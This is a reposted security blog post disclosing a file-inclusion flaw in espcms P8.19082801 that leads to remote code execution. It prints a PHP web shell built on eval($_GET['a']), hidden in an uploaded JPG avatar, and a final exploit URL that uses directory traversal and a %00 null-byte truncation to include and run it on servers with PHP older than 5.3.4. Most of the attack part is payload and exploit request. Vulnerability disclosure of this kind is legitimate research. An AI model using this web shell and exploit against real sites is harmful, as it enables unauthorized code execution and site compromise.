码迷,mamicode.com
首页 > 其他好文 > 详细

espcms P8.19082801 vulnerability

时间:2019-09-16 14:14:31      阅读:80      评论:0      收藏:0      [点我收藏+]

标签:png   tar   fir   UNC   tracking   odi   use   Requires   ide   

author: naiquan chai 

Net name:Hanamizuki花水木

Through  the vulnerability  we can get the webshell if we have enough privilege.

Affected by this vulnerability requires server-side php version <5.3.4

Demo

First enter the user module,then modify the user‘s avatar.Upload a file with the suffix jpg and the editorial content is 

<?php
class test{
public static function in_test(){
  eval($_GET[‘a‘]);
  }
}
?>

Upload success.We can get the path from the Web page source code.

技术图片

 Then go to the main page and pass in

"index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;"

 We find that the page echo 1.

 

Source code analysis

espcms_web/espcms_load.php:

技术图片

 We can find that through ac parameters we can include files, and at parameters can execute methods.

Tracking function espcms_get_ac() and function espcms_get_at():

技术图片

 We can see that the function does not filter user input at all,so  ac parameter can facilitate the directory,this results in arbitrary file inclusion.

However,through the file espcms_web/espcms_load.php, we find that the ac parameter is automatically followed by a .php suffix.

We can use truncation vulnerabilities to bypass it,this requires  PHP version < 5.3.4

 

Final exp

index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;

espcms P8.19082801 vulnerability

标签:png   tar   fir   UNC   tracking   odi   use   Requires   ide   

原文地址:https://www.cnblogs.com/cimuhuashuimu/p/11526726.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!